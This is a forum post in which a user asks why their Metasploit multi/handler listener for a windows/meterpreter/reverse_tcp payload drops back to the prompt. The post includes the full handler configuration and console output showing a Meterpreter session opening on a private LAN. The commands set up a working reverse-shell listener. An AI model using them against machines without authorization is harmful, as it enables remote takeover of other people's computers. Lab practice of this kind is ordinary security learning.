Hi Guys,
I can't figure out what I am doing wrong or if there is something wrong with my Metasploit setup
v4.16.7
I have created a basic reverse_tcp payload with msfvenom, when I start my listener I do the following
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.8
LHOST => 192.168.0.8
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.0.8:4444
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.8:4444 -> 192.168.0.7:50298) at 2017-10-25 16:05:13 -0400
I am expecting to see a meterpreter but nothing...
What's weird is I have watched a few tutorials and after typing exploit the console "waits" for the payload to be executed, once that happens the interpreter appears, but after I type exploit the console does not wait, I got straight back to msf exploit(handler) >
Any help much appreciated.